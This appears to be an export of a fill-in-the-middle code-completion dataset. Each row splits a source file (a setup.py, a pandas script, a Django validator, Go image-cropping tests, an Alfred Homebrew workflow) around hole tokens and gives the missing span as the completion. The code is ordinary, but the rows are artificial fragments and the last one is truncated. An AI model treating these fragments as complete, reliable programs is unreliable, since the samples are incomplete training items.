prompt
large_stringlengths
70
991k
completion
large_stringlengths
0
1.02k
<|file_name|>setup.py<|end_file_name|><|fim▁begin|><|fim▁hole|>setup(name='mock_labels', version='0.0.1', packages=['mock_labels'])<|fim▁end|>
from setuptools import setup
<|file_name|>best-feats.py<|end_file_name|><|fim▁begin|>import sys import os import pandas as pd from collections import defaultdict import numpy as np dirname = sys.argv[1] path = os.path.join(dirname, "weights.tsv") with open(path ,"r") as f: df = pd.read_csv(f, sep="\t") df = df[df["iter"] == 5] fc2r = defaultdict(list) features = set() <|fim▁hole|> event_df.loc[event_df["class"] == "SELECT", "rank"] = pos_df["weight"].argsort() for _, row in event_df.loc[event_df["class"] == "SELECT"][["name", "weight", "rank"]].iterrows(): clazz = "SELECT" feature = row["name"] rank = row["rank"] fc2r[(feature, clazz)].append(rank) features.add(feature) neg_df = event_df[event_df["class"] == "NEXT"] event_df.loc[event_df["class"] == "NEXT", "rank"] = neg_df["weight"].argsort() for _, row in event_df.loc[event_df["class"] == "NEXT"][["name", "weight", "rank"]].iterrows(): clazz = "NEXT" feature = row["name"] rank = row["rank"] fc2r[(feature, clazz)].append(rank) features.add(feature) f2d = {} for feature in features: sel_u = np.mean(fc2r[(feature, "SELECT")]) next_u = np.mean(fc2r[(feature, "NEXT")]) diff = max(sel_u, next_u) - min(sel_u, next_u) f2d[feature] = diff print feat_diff = sorted(f2d.items(), key=lambda x: x[1]) for feat, diff in feat_diff[-50:]: print feat<|fim▁end|>
for event, event_df in df.groupby("event"): pos_df = event_df[event_df["class"] == "SELECT"]
<|file_name|>validators.py<|end_file_name|><|fim▁begin|><|fim▁hole|> class MultiFieldsValidator(object): fields = () error_messages = { 'invalid' : _(u'Value is not valid.') } def raise_error(self, form, error="invalid"): for field in self.fields: form._errors[field] = form.error_class([self.error_messages[error]]) def validate(self, cleaned_data, form): return cleaned_data<|fim▁end|>
# coding: utf-8 from django.utils.translation import ugettext_lazy as _
<|file_name|>tools_test.go<|end_file_name|><|fim▁begin|>package imaging import ( "image" "testing" ) func TestCrop(t *testing.T) { td := []struct { desc string src image.Image r image.Rectangle want *image.NRGBA }{ { "Crop 2x3 2x1", &image.NRGBA{ Rect: image.Rect(-1, -1, 1, 2), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, image.Rect(-1, 0, 1, 1), &image.NRGBA{ Rect: image.Rect(0, 0, 2, 1), Stride: 2 * 4, Pix: []uint8{ 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, }, }, }, } for _, d := range td { got := Crop(d.src, d.r) want := d.want if !compareNRGBA(got, want, 0) { t.Errorf("test [%s] failed: %#v", d.desc, got) } } } func TestCropCenter(t *testing.T) { td := []struct { desc string src image.Image w, h int want *image.NRGBA }{ { "CropCenter 2x3 2x1", &image.NRGBA{ Rect: image.Rect(-1, -1, 1, 2), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, 2, 1, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 1), Stride: 2 * 4, Pix: []uint8{ 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, }, }, }, { "CropCenter 2x3 0x1", &image.NRGBA{ Rect: image.Rect(-1, -1, 1, 2), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, 0, 1, &image.NRGBA{ Rect: image.Rect(0, 0, 0, 0), Stride: 0, Pix: []uint8{}, }, }, { "CropCenter 2x3 5x5", &image.NRGBA{ Rect: image.Rect(-1, -1, 1, 2), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, 5, 5, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 3), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, }, } for _, d := range td { got := CropCenter(d.src, d.w, d.h) want := d.want if !compareNRGBA(got, want, 0) { t.Errorf("test [%s] failed: %#v", d.desc, got) } } } func TestCropAnchor(t *testing.T) { td := []struct { desc string src image.Image w, h int anchor Anchor want *image.NRGBA }{ { "CropAnchor 4x4 2x2 TopLeft", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 2, 2, TopLeft, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, }, }, }, { "CropAnchor 4x4 2x2 Top", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 2, 2, Top, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 2 * 4, Pix: []uint8{ 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, }, }, }, { "CropAnchor 4x4 2x2 TopRight", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 2, 2, TopRight, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 2 * 4, Pix: []uint8{ 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, }, }, }, { "CropAnchor 4x4 2x2 Left", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 2, 2, Left, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 2 * 4, Pix: []uint8{ 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, }, }, }, { "CropAnchor 4x4 2x2 Center", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 2, 2, Center, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 2 * 4, Pix: []uint8{ 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, }, }, }, { "CropAnchor 4x4 2x2 Right", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 2, 2, Right, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 2 * 4, Pix: []uint8{ 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, }, }, }, { "CropAnchor 4x4 2x2 BottomLeft", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 2, 2, BottomLeft, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 2 * 4, Pix: []uint8{ 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, }, }, }, { "CropAnchor 4x4 2x2 Bottom", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 2, 2, Bottom, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 2 * 4, Pix: []uint8{ 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, }, }, }, { "CropAnchor 4x4 2x2 BottomRight", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 2, 2, BottomRight, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 2 * 4, Pix: []uint8{ 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, }, { "CropAnchor 4x4 0x0 BottomRight", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 0, 0, BottomRight, &image.NRGBA{ Rect: image.Rect(0, 0, 0, 0), Stride: 0, Pix: []uint8{}, }, }, { "CropAnchor 4x4 100x100 BottomRight", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 100, 100, BottomRight, &image.NRGBA{ Rect: image.Rect(0, 0, 4, 4), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, }, { "CropAnchor 4x4 1x100 BottomRight", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 1, 100, BottomRight, &image.NRGBA{ Rect: image.Rect(0, 0, 1, 4), Stride: 1 * 4, Pix: []uint8{ 0x0c, 0x0d, 0x0e, 0x0f, 0x1c, 0x1d, 0x1e, 0x1f, 0x2c, 0x2d, 0x2e, 0x2f, 0x3c, 0x3d, 0x3e, 0x3f, }, }, }, { "CropAnchor 4x4 0x100 BottomRight", &image.NRGBA{ Rect: image.Rect(-1, -1, 3, 3), Stride: 4 * 4, Pix: []uint8{ 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, }, }, 0, 100, BottomRight, &image.NRGBA{ Rect: image.Rect(0, 0, 0, 0), Stride: 0, Pix: []uint8{}, }, }, } for _, d := range td { got := CropAnchor(d.src, d.w, d.h, d.anchor) want := d.want if !compareNRGBA(got, want, 0) { t.Errorf("test [%s] failed: %#v", d.desc, got) } } } func TestPaste(t *testing.T) { td := []struct { desc string src1 image.Image src2 image.Image p image.Point want *image.NRGBA }{ { "Paste 2x3 2x1", &image.NRGBA{ Rect: image.Rect(-1, -1, 1, 2), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, &image.NRGBA{ Rect: image.Rect(1, 1, 3, 2), Stride: 2 * 4, Pix: []uint8{ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, }, }, image.Pt(-1, 0), &image.NRGBA{ Rect: image.Rect(0, 0, 2, 3), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, }, } for _, d := range td { got := Paste(d.src1, d.src2, d.p) want := d.want if !compareNRGBA(got, want, 0) { t.Errorf("test [%s] failed: %#v", d.desc, got) } } } func TestPasteCenter(t *testing.T) { td := []struct { desc string src1 image.Image src2 image.Image want *image.NRGBA }{ { "PasteCenter 2x3 2x1", &image.NRGBA{ Rect: image.Rect(-1, -1, 1, 2), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, &image.NRGBA{ Rect: image.Rect(1, 1, 3, 2), Stride: 2 * 4, Pix: []uint8{ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, }, }, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 3), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, }, } for _, d := range td { got := PasteCenter(d.src1, d.src2) want := d.want if !compareNRGBA(got, want, 0) { t.Errorf("test [%s] failed: %#v", d.desc, got) } } } func TestOverlay(t *testing.T) { td := []struct { desc string src1 image.Image src2 image.Image p image.Point a float64 want *image.NRGBA }{ { "Overlay 2x3 2x1 1.0", &image.NRGBA{ Rect: image.Rect(-1, -1, 1, 2), Stride: 2 * 4, Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff, 0x60, 0x00, 0x90, 0xff, 0xff, 0x00, 0x99, 0x7f, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, &image.NRGBA{ Rect: image.Rect(1, 1, 3, 2), Stride: 2 * 4, Pix: []uint8{ 0x20, 0x40, 0x80, 0x7f, 0xaa, 0xbb, 0xcc, 0xff, }, }, image.Pt(-1, 0), 1.0, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 3), Stride: 2 * 4,<|fim▁hole|> 0x40, 0x1f, 0x88, 0xff, 0xaa, 0xbb, 0xcc, 0xff, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, }, }, }, { "Overlay 2x2 2x2 0.5", &image.NRGBA{ Rect: image.Rect(-1, -1, 1, 1), Stride: 2 * 4, Pix: []uint8{ 0xff, 0x00, 0x00, 0xff, 0x00, 0xff, 0x00, 0xff, 0x00, 0x00, 0xff, 0xff, 0x20, 0x20, 0x20, 0x00, }, }, &image.NRGBA{ Rect: image.Rect(-1, -1, 1, 1), Stride: 2 * 4, Pix: []uint8{ 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0x20, 0x20, 0x20, 0xff, }, }, image.Pt(-1, -1), 0.5, &image.NRGBA{ Rect: image.Rect(0, 0, 2, 2), Stride: 2 * 4, Pix: []uint8{ 0xff, 0x7f, 0x7f, 0xff, 0x00, 0xff, 0x00, 0xff, 0x7f, 0x7f, 0x7f, 0xff, 0x20, 0x20, 0x20, 0x7f, }, }, }, } for _, d := range td { got := Overlay(d.src1, d.src2, d.p, d.a) want := d.want if !compareNRGBA(got, want, 1) { t.Errorf("test [%s] failed: %#v", d.desc, got) } } }<|fim▁end|>
Pix: []uint8{ 0x00, 0x11, 0x22, 0x33, 0xcc, 0xdd, 0xee, 0xff,
<|file_name|>brew.py<|end_file_name|><|fim▁begin|># encoding: utf-8 import os import subprocess import sys from workflow import Workflow3 as Workflow, MATCH_SUBSTRING from workflow.background import run_in_background import brew_actions import helpers GITHUB_SLUG = 'fniephaus/alfred-homebrew' def execute(wf, cmd_list): brew_arch = helpers.get_brew_arch(wf) new_env = helpers.initialise_path(brew_arch) cmd, err = subprocess.Popen(cmd_list, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=new_env).communicate() if err: return err return cmd def get_all_formulae(): return execute(wf, ['brew', 'formulae']).splitlines() def get_installed_formulae(): return execute(wf, ['brew', 'list', '--versions']).splitlines() def get_pinned_formulae(): return execute(wf, ['brew', 'list', '--pinned', '--versions']).splitlines() def get_outdated_formulae(): return execute(wf, ['brew', 'outdated', '--formula']).splitlines() def get_info(): return execute(wf, ['brew', 'info']) def get_commands(wf, query): result = execute(wf, ['brew', 'commands']).splitlines() commands = [x for x in result if ' ' not in x] query_filter = query.split() if len(query_filter) > 1: return wf.filter(query_filter[1], commands, match_on=MATCH_SUBSTRING) return commands def get_all_services(): services_response = execute(wf, ['brew', 'services', 'list']).splitlines() services_response.pop(0) services = [] for serviceLine in services_response: services.append({'name': serviceLine.split()[0], 'status': serviceLine.split()[1]}) return services def filter_all_formulae(wf, query): formulae = wf.cached_data('brew_all_formulae', get_all_formulae, max_age=3600) query_filter = query.split() if len(query_filter) > 1: return wf.filter(query_filter[1], formulae, match_on=MATCH_SUBSTRING) return formulae def filter_installed_formulae(wf, query): formulae = wf.cached_data('brew_installed_formulae', get_installed_formulae, max_age=3600) query_filter = query.split() if len(query_filter) > 1: return wf.filter(query_filter[1], formulae, match_on=MATCH_SUBSTRING) return formulae def filter_pinned_formulae(wf, query): formulae = wf.cached_data('brew_pinned_formulae', get_pinned_formulae, max_age=3600) query_filter = query.split() if len(query_filter) > 1: return wf.filter(query_filter[1], formulae, match_on=MATCH_SUBSTRING) return formulae def filter_outdated_formulae(wf, query): formulae = wf.cached_data('brew_outdated_formulae', get_outdated_formulae, max_age=3600) query_filter = query.split() if len(query_filter) > 1: return wf.filter(query_filter[1], formulae, match_on=MATCH_SUBSTRING) return formulae def filter_all_services(wf, query): services = wf.cached_data('brew_all_services', get_all_services, session=True) query_filter = query.split() if len(query_filter) > 1: return wf.filter(query_filter[1], services, key=lambda x: x['name'], match_on=MATCH_SUBSTRING) return services def add_service_actions(wf, service_name): wf.add_item('Run Service', 'Run the service formula without registering to launch at login (or boot).', autocomplete='services %s run' % service_name, arg='brew services run %s' % service_name, valid=True, icon=helpers.get_icon(wf, 'chevron-right')) wf.add_item('Stop Service', 'Stop the service formula immediately and unregister it from launching at login (or boot).', autocomplete='services %s stop' % service_name, arg='brew services stop %s' % service_name, valid=True, icon=helpers.get_icon(wf, 'chevron-right')) wf.add_item('Start Service', 'Start the service formula immediately and register it to launch at login (or boot).', autocomplete='services %s start' % service_name, arg='brew services start %s' % service_name, valid=True, icon=helpers.get_icon(wf, 'chevron-right')) wf.add_item('Restart Service', 'Stop (if necessary) and start the service formula immediately and register it to launch ' 'at login (or boot).', autocomplete='services %s restart' % service_name, arg='brew services restart %s' % service_name, valid=True, icon=helpers.get_icon(wf, 'chevron-right')) def main(wf): if wf.update_available: wf.add_item('An update is available!', autocomplete='workflow:update', valid=False, icon=helpers.get_icon(wf, 'cloud-download')) # Check for brew installation find_brew = helpers.brew_installed() if not (find_brew['INTEL'] or find_brew['ARM']): helpers.brew_installation_instructions(wf) else: # extract query query = wf.args[0] if len(wf.args) else None if (not query and len(wf.cached_data('brew_outdated_formulae', get_outdated_formulae, max_age=3600)) > 0): wf.add_item('Some of your formulae are outdated!', autocomplete='outdated ', valid=False, icon=helpers.get_icon(wf, 'cloud-download')) if query and query.startswith('install'): for formula in filter_all_formulae(wf, query): wf.add_item(formula, 'Install formula.', arg='brew install %s' % formula, valid=True, icon=helpers.get_icon(wf, 'package')) elif query and query.startswith('services'): query_filter = query.split() if len(query_filter) == 2 and query.endswith(' '): service_name = query_filter[1] add_service_actions(wf, service_name) else: services = filter_all_services(wf, query) for service in services: wf.add_item(service['name'], 'Select for action. Status: %s' % service['status'], autocomplete='services %s ' % service['name'], arg='', valid=False, icon=helpers.get_icon(wf, 'package')) elif query and query.startswith('search'): for formula in filter_all_formulae(wf, query): wf.add_item(formula, 'Open formula on GitHub.', arg='brew info --github %s' % formula, valid=True, icon=helpers.get_icon(wf, 'package')) elif query and query.startswith('uninstall'): for formula in filter_installed_formulae(wf, query): name = formula.rsplit()[0] wf.add_item(formula, 'Uninstall formula.', arg='brew uninstall %s' % name, valid=True, icon=helpers.get_icon(wf, 'package')) elif query and query.startswith('list'): for formula in filter_installed_formulae(wf, query): name = formula.rsplit()[0] 